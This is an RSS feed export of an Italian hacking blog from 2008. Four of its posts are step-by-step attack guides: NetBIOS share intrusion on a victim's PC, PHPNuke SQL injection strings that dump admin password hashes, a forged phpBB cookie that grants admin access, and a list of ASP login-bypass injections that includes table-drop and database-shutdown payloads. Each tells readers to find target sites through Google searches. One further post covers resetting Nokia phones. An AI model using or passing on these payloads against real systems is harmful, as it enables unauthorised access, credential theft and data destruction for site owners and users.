<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>h4ckarchive security blog</title>
	<atom:link href="http://h4ckarchive.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://h4ckarchive.wordpress.com</link>
	<description>Il blog dedicato alla sicurezza informatica</description>
	<lastBuildDate>Tue, 16 Sep 2008 20:35:30 +0000</lastBuildDate>
	<language>it</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='h4ckarchive.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>h4ckarchive security blog</title>
		<link>http://h4ckarchive.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://h4ckarchive.wordpress.com/osd.xml" title="h4ckarchive security blog" />
	<atom:link rel='hub' href='http://h4ckarchive.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Remote Penetration: Entrare in PC altrui con la porta 139 (NetBios)</title>
		<link>http://h4ckarchive.wordpress.com/2008/09/16/remote-penetration-139-netbios/</link>
		<comments>http://h4ckarchive.wordpress.com/2008/09/16/remote-penetration-139-netbios/#comments</comments>
		<pubDate>Tue, 16 Sep 2008 20:33:54 +0000</pubDate>
		<dc:creator>TheDevil</dc:creator>
				<category><![CDATA[Remote Penetration]]></category>

		<guid isPermaLink="false">http://h4ckarchive.wordpress.com/?p=30</guid>
		<description><![CDATA[Prima di tutto, prelevate l’IP della vittima. Fate una scansione dell&#8217;IP per vedere se la porta 139 del PC della vittima è aperta con un port scanner (potete usare Nmap sia per Linux che per Windows). Appena avete trovato la porta 139 aperta, apriamo il prompt di comandi andando su Start -&#62; Esegui -&#62; cmd.exe. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4ckarchive.wordpress.com&amp;blog=4853707&amp;post=30&amp;subd=h4ckarchive&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Prima di tutto,<strong> prelevate l’IP della vittima</strong>.</p>
<p>Fate una scansione dell&#8217;IP per vedere se la porta 139 del PC della vittima è aperta con un port scanner (potete usare <strong>Nmap </strong>sia per Linux che per Windows).</p>
<p>Appena avete trovato la <strong>porta 139 aperta</strong>, apriamo il prompt di comandi andando su <strong>Start -&gt; Esegui -&gt; cmd.exe</strong>.</p>
<p>Digitate: <strong>cd C:\Windows</strong><br />
Digitate: <strong>Nbtstat -A “IP” (l’ip della vittima con la porta 139 aperta)<br />
</strong>Adesso comparirà una tabella con nome, tipo e stato… prendiamo nota del nome dell’IP della nostra vittima<br />
Adesso digitate: <strong>Edit C:\windows\lmhosts</strong><br />
Adesso nel file da modificare (nella schermata blu) inseriamo:<strong> “IP”&#8221;NOME DELL’IP DELLA VITTIMA”#PRE</strong><br />
Appena avete finito, andate su <strong>File -&gt; Salva e uscite (File -&gt; Esci)</strong><br />
Digitate: <strong>Nbtstat -R</strong><br />
Digitate: <strong>Net View \\”NOME DELL’IP DELLA VITTIMA”</strong><br />
Se non avete sbagliato, vi uscirà la lista delle periferiche condivise (stampanti, HD…)<br />
Ora basta andare in <strong>Risorse di Rete -&gt; Strumenti -&gt; Connetti ad unità di rete</strong> e inserite come <strong>nome dell’unità rete</strong>: <strong>\\”NOME DELL’IP DELLA VITTIMA”\C</strong><br />
<strong>L’unità C</strong> è <strong>condivisa </strong>nel vostro PC.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/h4ckarchive.wordpress.com/30/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/h4ckarchive.wordpress.com/30/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4ckarchive.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4ckarchive.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4ckarchive.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4ckarchive.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4ckarchive.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4ckarchive.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4ckarchive.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4ckarchive.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4ckarchive.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4ckarchive.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4ckarchive.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4ckarchive.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4ckarchive.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4ckarchive.wordpress.com/30/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4ckarchive.wordpress.com&amp;blog=4853707&amp;post=30&amp;subd=h4ckarchive&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4ckarchive.wordpress.com/2008/09/16/remote-penetration-139-netbios/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e91cd67f3602c29c54fe45d6e2af4409?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">TheDevil</media:title>
		</media:content>
	</item>
		<item>
		<title>SQL: PHPNuke 7.2 &#8211; 7.6 SQL Injection</title>
		<link>http://h4ckarchive.wordpress.com/2008/09/16/sql-phpnuke-72-76-sql-injection/</link>
		<comments>http://h4ckarchive.wordpress.com/2008/09/16/sql-phpnuke-72-76-sql-injection/#comments</comments>
		<pubDate>Tue, 16 Sep 2008 20:21:38 +0000</pubDate>
		<dc:creator>TheDevil</dc:creator>
				<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://h4ckarchive.wordpress.com/?p=28</guid>
		<description><![CDATA[Ecco una vulnerabilità SQL ben nota che affligge PHPNuke 7.2 e PHPNuke 7.6. Come trovare siti PHPNuke? Cercate su Google Powered by PHPNuke. Versioni PHPNuke 7.2: Sfruttando il bug Cerca/Search Appena abbiamo trovato il sito giusto, andiamo sulla pagina Cerca o Search del sito web.. Inseriamo una stringa sul modulo di ricerca, che permette di [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4ckarchive.wordpress.com&amp;blog=4853707&amp;post=28&amp;subd=h4ckarchive&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:left;">Ecco una vulnerabilità SQL ben nota che affligge PHPNuke 7.2 e PHPNuke 7.6.</p>
<p style="text-align:left;"><strong>Come trovare siti PHPNuke?</strong></p>
<p>Cercate su Google <strong>Powered by PHPNuke</strong>.</p>
<p><strong>Versioni PHPNuke 7.2: Sfruttando il bug Cerca/Search</strong></p>
<p>Appena abbiamo trovato il sito giusto, andiamo sulla pagina <strong>Cerca o Search</strong> del sito web..</p>
<p>Inseriamo una stringa sul modulo di ricerca, che permette di chiedere al database SQL, di mostrarci i nomi degli admin con le password… la stringa è questa: <strong>p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* </strong></p>
<p>Ora ci verrà mostrata una pagina con tutti i nomi degli admin con delle scritte blu linkabili. Se la versione del Nuke è vecchia, vedrete direttamente le password, se invece è più nuova, vedrete tanti numeri e lettere, ciò significa che è <strong>criptata in MD5</strong>, per decryptarla vi consiglio <a href="http://www.h4ckarchive.wordpress.com"><strong>www.passcracking.ru</strong></a>.</p>
<p><strong>Versioni PHPNuke 7.6: Sfruttando il bug Top 10.</strong></p>
<p>Appena troviamo il sito giusto da hackerare, andiamo nella pagina Top 10 del sito<br />
web. Inseriamo questa stringa, che chiede al database SQL di mostrare le password (criptate in MD5): <strong>&amp;querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors </strong></p>
<p>L’indirizzo della pagina web con la stringa dovrebbe essere questo:<br />
<strong>www.sitoweb.com/phpNuke/modules.php?name=Top&amp;querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors</strong></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/h4ckarchive.wordpress.com/28/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/h4ckarchive.wordpress.com/28/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4ckarchive.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4ckarchive.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4ckarchive.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4ckarchive.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4ckarchive.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4ckarchive.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4ckarchive.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4ckarchive.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4ckarchive.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4ckarchive.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4ckarchive.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4ckarchive.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4ckarchive.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4ckarchive.wordpress.com/28/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4ckarchive.wordpress.com&amp;blog=4853707&amp;post=28&amp;subd=h4ckarchive&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4ckarchive.wordpress.com/2008/09/16/sql-phpnuke-72-76-sql-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e91cd67f3602c29c54fe45d6e2af4409?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">TheDevil</media:title>
		</media:content>
	</item>
		<item>
		<title>Phreaking: Eseguire una formattazione completa su Nokia</title>
		<link>http://h4ckarchive.wordpress.com/2008/09/15/eseguire-una-formattazione-completa-su-nokia/</link>
		<comments>http://h4ckarchive.wordpress.com/2008/09/15/eseguire-una-formattazione-completa-su-nokia/#comments</comments>
		<pubDate>Mon, 15 Sep 2008 13:22:45 +0000</pubDate>
		<dc:creator>ToxicMind</dc:creator>
				<category><![CDATA[Phreaking]]></category>

		<guid isPermaLink="false">http://h4ckarchive.wordpress.com/?p=17</guid>
		<description><![CDATA[Con queste semplici istruzioni saremo in grado di eseguire una formattazione di tipo &#8220;completo&#8221; sul nostro cellulare Symbian. Nota bene Prima di poter effettuare la formattazione, è cosa buona e giusta: 1) avere la batteria completamente carica; 2) eseguire un backup di tutti i dati e passarli sulla memory stick in modo da non perderli; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4ckarchive.wordpress.com&amp;blog=4853707&amp;post=17&amp;subd=h4ckarchive&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Con queste semplici istruzioni saremo in grado di eseguire una formattazione di tipo &#8220;completo&#8221; sul nostro cellulare <span style="font-style:italic;">Symbian</span>.<br />
<span style="font-weight:bold;">Nota bene</span><br />
Prima di poter effettuare la formattazione, è cosa buona e giusta:<br />
1) avere la batteria completamente carica;<br />
2) eseguire un backup di tutti i dati e passarli sulla memory stick in modo da non perderli;<br />
3) sapere i codici di sicurezza del cellulare.<br />
- quelli standard sono:</p>
<pre><strong>0000</strong>
<strong>1234
12345
</strong></pre>
<p>Adesso bisognerà spegnere il cellulare e riaccenderlo tenendo premuti i tasti segnalati con il bollino rosso affinchè non appaia <span style="font-style:italic;">formatting</span> sul display.<br />
Al termine della formattazione in cellulare si riavvierà automaticamente e tornerà come nuovo.</p>
<p><a href="http://h4ckarchive.files.wordpress.com/2008/09/nokia_66001.jpg"><img class="alignnone size-full wp-image-24" title="nokia_66001" src="http://h4ckarchive.files.wordpress.com/2008/09/nokia_66001.jpg?w=600" alt=""   /></a></p>
<blockquote><p>Questa formattazione è stata testata su parecchi Nokia con sistema operativo <span style="font-style:italic;">Symbian</span> solo che a differenza del Nokia 6600 non vi apparirà <span style="font-style:italic;">formatting</span>. Però la formattazione avrà lo stesso buon esito.</p></blockquote>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/h4ckarchive.wordpress.com/17/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/h4ckarchive.wordpress.com/17/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4ckarchive.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4ckarchive.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4ckarchive.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4ckarchive.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4ckarchive.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4ckarchive.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4ckarchive.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4ckarchive.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4ckarchive.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4ckarchive.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4ckarchive.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4ckarchive.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4ckarchive.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4ckarchive.wordpress.com/17/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4ckarchive.wordpress.com&amp;blog=4853707&amp;post=17&amp;subd=h4ckarchive&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4ckarchive.wordpress.com/2008/09/15/eseguire-una-formattazione-completa-su-nokia/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/76d0fe07be071488e98315f7359b0c30?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ToxicMind</media:title>
		</media:content>

		<media:content url="http://h4ckarchive.files.wordpress.com/2008/09/nokia_66001.jpg" medium="image">
			<media:title type="html">nokia_66001</media:title>
		</media:content>
	</item>
		<item>
		<title>Cookie Stealing: phpBB v1 e phpBB v2</title>
		<link>http://h4ckarchive.wordpress.com/2008/09/15/cookie-stealing-phpbb-v1-e-phpbb-v2/</link>
		<comments>http://h4ckarchive.wordpress.com/2008/09/15/cookie-stealing-phpbb-v1-e-phpbb-v2/#comments</comments>
		<pubDate>Mon, 15 Sep 2008 12:38:23 +0000</pubDate>
		<dc:creator>TheDevil</dc:creator>
				<category><![CDATA[Cookie Stealing]]></category>

		<guid isPermaLink="false">http://h4ckarchive.wordpress.com/?p=13</guid>
		<description><![CDATA[In questa guida spiegherò brevemente come diventare amministratori su forum phpBB v1 e v2, utilizzando Mozilla Firefox. Questo tipo di attacco funziona solo con i forum non fixati per i cookie. Prima di tutto andiamo su Google per cercare un forum phpBB scrivendo “Powered By Phpbb 1.0.12“. Adesso svuotate i cookie andando su Strumenti &#62; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4ckarchive.wordpress.com&amp;blog=4853707&amp;post=13&amp;subd=h4ckarchive&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>In questa guida spiegherò brevemente come diventare amministratori su forum phpBB v1 e v2, utilizzando Mozilla Firefox. Questo tipo di attacco funziona solo con i forum non fixati per i cookie.</p>
<p>Prima di tutto andiamo su Google per cercare un forum phpBB scrivendo <strong>“Powered By Phpbb 1.0.12“</strong>. Adesso svuotate i cookie andando su <strong>Strumenti &gt; Opzioni &gt; Privacy &gt; Svuota cookie adesso.</strong></p>
<p>Una volta trovato andiamo nella pagina iniziale del forum ovvero <strong>www.forum.com/index.php</strong>. Andate su <strong>C:\Documents And Settings\User\Dati Applicazioni\Mozilla\Firefox\Cartella*</strong></p>
<p><strong>Aprite la cartella</strong> presente (è normale che abbia tanti numeri e lettere messe a caso). Adesso aprite il file <strong>cookie.txt</strong> e cercate la stringa <strong>phpbb2mysql_data</strong>. Se avete trovato la stringa, avrete notato che è seguita da un’altra stringa che dovrebbe essere qualcosa del genere: <strong>a%3A0%3A%7B%7D</strong></p>
<p>Adesso sostitute a%3A0%3A%7B%7D (la stringa che la segue) con <strong>a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D</strong></p>
<p>Salvate il file e chiudete il file di testo. Chiudete adesso tutte le sessioni di Firefox. Riaprite Firefox e tornate sulla pagina del forum. Adesso dovreste essere amministratori, e potete anche andare sul pannello di amministrazione del forum.</p>
<p>Testato con Mozilla Firefox 2.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/h4ckarchive.wordpress.com/13/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/h4ckarchive.wordpress.com/13/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4ckarchive.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4ckarchive.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4ckarchive.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4ckarchive.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4ckarchive.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4ckarchive.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4ckarchive.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4ckarchive.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4ckarchive.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4ckarchive.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4ckarchive.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4ckarchive.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4ckarchive.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4ckarchive.wordpress.com/13/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4ckarchive.wordpress.com&amp;blog=4853707&amp;post=13&amp;subd=h4ckarchive&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4ckarchive.wordpress.com/2008/09/15/cookie-stealing-phpbb-v1-e-phpbb-v2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e91cd67f3602c29c54fe45d6e2af4409?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">TheDevil</media:title>
		</media:content>
	</item>
		<item>
		<title>SQL: ASP SQL Injection</title>
		<link>http://h4ckarchive.wordpress.com/2008/09/15/sql-asp-sql-injection/</link>
		<comments>http://h4ckarchive.wordpress.com/2008/09/15/sql-asp-sql-injection/#comments</comments>
		<pubDate>Mon, 15 Sep 2008 12:16:47 +0000</pubDate>
		<dc:creator>TheDevil</dc:creator>
				<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://h4ckarchive.wordpress.com/?p=7</guid>
		<description><![CDATA[Oggi, tratterò di un argomento abbastanza diffuso, ovvero l’SQL Injection su siti creati in ASP… spiegherò come avviene. Innanzitutto, cos&#8217;è l&#8217;SQL Injection? L&#8217;SQL injection è un exploit mirato a colpire le applicazioni web che si appoggiano su un database di tipo SQL. Questo exploit sfrutta l’inefficienza dei controlli sui dati ricevuti in input ed inserisce [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4ckarchive.wordpress.com&amp;blog=4853707&amp;post=7&amp;subd=h4ckarchive&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Oggi, tratterò di un argomento abbastanza diffuso, ovvero l’SQL Injection su siti creati in ASP… spiegherò come avviene.</p>
<p>Innanzitutto, cos&#8217;è l&#8217;SQL Injection? L&#8217;SQL injection è un exploit mirato a colpire le applicazioni web che si appoggiano su un database di tipo SQL. Questo exploit sfrutta l’inefficienza dei controlli sui dati ricevuti in input ed inserisce codice maligno all’interno di una query SQL. Le conseguenze prodotte sono imprevedibili per il programmatore: l’SQL Injection permette al malintenzionato di autenticarsi con ampi privilegi in aree protette del sito (ovviamente, anche senza essere in possesso delle credenziali d’accesso) e di visualizzare e/o alterare dati sensibili. Ecco come avviene, e come i malintenzionati riescono a loggarsi come admin tramite delle query:</p>
<p>1) Andiamo su Google e cerchiamo <strong>inurl:login.asp</strong> oppure <strong>inurl:admin.asp</strong></p>
<p>2) Clicchiamo su un risultato qualsiasi, e dovremmo entrare nel login di un sito web in ASP</p>
<p>3) Possiamo ora inserire la query (username e password), esempio:</p>
<p><strong>Username: admin</strong></p>
<p><strong>Password: &#8216;or&#8217;</strong></p>
<p>4) Se funziona siete entrati con successo come amministratore!</p>
<p>Ecco le altre query (username e password):</p>
<p>Nome: ‘ OR ”=’<br />
Password: ‘ OR ”=’<br />
Query Risultante :<br />
SELECT * FROM Utenti WHERE nome= ‘ ‘ OR ”=’ ‘ AND password=” OR ”=’ ‘<br />
Effetto si viene identificati con il primo record del database</p>
<p>Nome: ‘ OR ‘1A=’1<br />
Password: ‘ OR ‘1A=’1<br />
Query Risultante:<br />
SELECT * FROM Utenti WHERE nome= ” OR ‘1A=’1 ‘ AND password=” OR ‘1A=’1 ‘<br />
Effetto = si viene identificati con il primo record del database</p>
<p>Nome: ‘ or ‘1=1 —<br />
Password: ‘ or ‘1=1 —<br />
Query Risultante:<br />
SELECT * FROM Utenti WHERE nome= ” or ‘1=1 — ‘ AND password=” or ‘1=1 —’<br />
Effetto = si viene identificati con il primo record del database</p>
<p>Nome:’ or Nome like ‘%%<br />
Password: ‘ or Nome like ‘%%<br />
Query Risultante:<br />
SELECT * FROM Utenti WHERE nome= ” or Nome like ‘%% ‘ AND password=” or<br />
Nome like ‘%%’<br />
Effetto = si viene identificati con il primo record del database</p>
<p>Nome: [stringa nulla]<br />
Password: ‘ OR ‘Attacco’ LIKE ‘Att%<br />
Query Risultante:<br />
SELECT * FROM Utenti WHERE nome= ‘ ‘ AND password=” OR ‘Attacco’ LIKE<br />
‘Att%’<br />
Effetto = Autenticazione come utente admin</p>
<p>Nome:[una stringa qualsiasi]<br />
Password: c’ OR ‘ TRUE—<br />
Query Risultante:<br />
SELECT * FROM Utenti WHERE nome= ‘ ‘ AND password=’c’ OR ‘ TRUE—’<br />
Effetto = si viene identificati con il primo record del database</p>
<p>Nome: admin’ –<br />
Password: [stringa nulla]<br />
Query Risultante:<br />
SELECT * FROM Utenti WHERE nome= ‘ admin’ –’ AND password=’ ‘<br />
Effetto = Autenticazione come utente admin</p>
<p>Nome: ‘ OR ‘Attacco’ &gt; ‘A<br />
Password: ‘ OR ‘Attacco’ &gt; ‘A<br />
Query Risultante:<br />
SELECT * FROM Utenti WHERE nome= ‘ ‘ OR ‘Attacco’ &gt; ‘A’ AND password=”OR<br />
‘Attacco’ &gt; ‘A’<br />
Effetto = Autenticazione come utente admin</p>
<p>Nome: ‘ ; drop table utenti–<br />
Password: [stringa nulla]<br />
Query Risultante:<br />
SELECT * FROM Utenti WHERE nome= ‘ ‘ ; drop table utenti–’ AND password=’ ‘<br />
Effetti = Eliminazione della tabella dal database</p>
<p>Nome: aaaaaaaaaaaaaaa’<br />
Password: ‘ ; shutdown –<br />
Query Risultante:<br />
SELECT * FROM Utenti WHERE nome= ‘ aaaaaaaaaaaaaaa” AND password=” ;<br />
shutdown –’<br />
Effetto = Chiusura del database</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/h4ckarchive.wordpress.com/7/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/h4ckarchive.wordpress.com/7/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/h4ckarchive.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/h4ckarchive.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/h4ckarchive.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/h4ckarchive.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/h4ckarchive.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/h4ckarchive.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/h4ckarchive.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/h4ckarchive.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/h4ckarchive.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/h4ckarchive.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/h4ckarchive.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/h4ckarchive.wordpress.com/7/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/h4ckarchive.wordpress.com/7/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/h4ckarchive.wordpress.com/7/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=h4ckarchive.wordpress.com&amp;blog=4853707&amp;post=7&amp;subd=h4ckarchive&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://h4ckarchive.wordpress.com/2008/09/15/sql-asp-sql-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e91cd67f3602c29c54fe45d6e2af4409?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">TheDevil</media:title>
		</media:content>
	</item>
	</channel>
</rss>
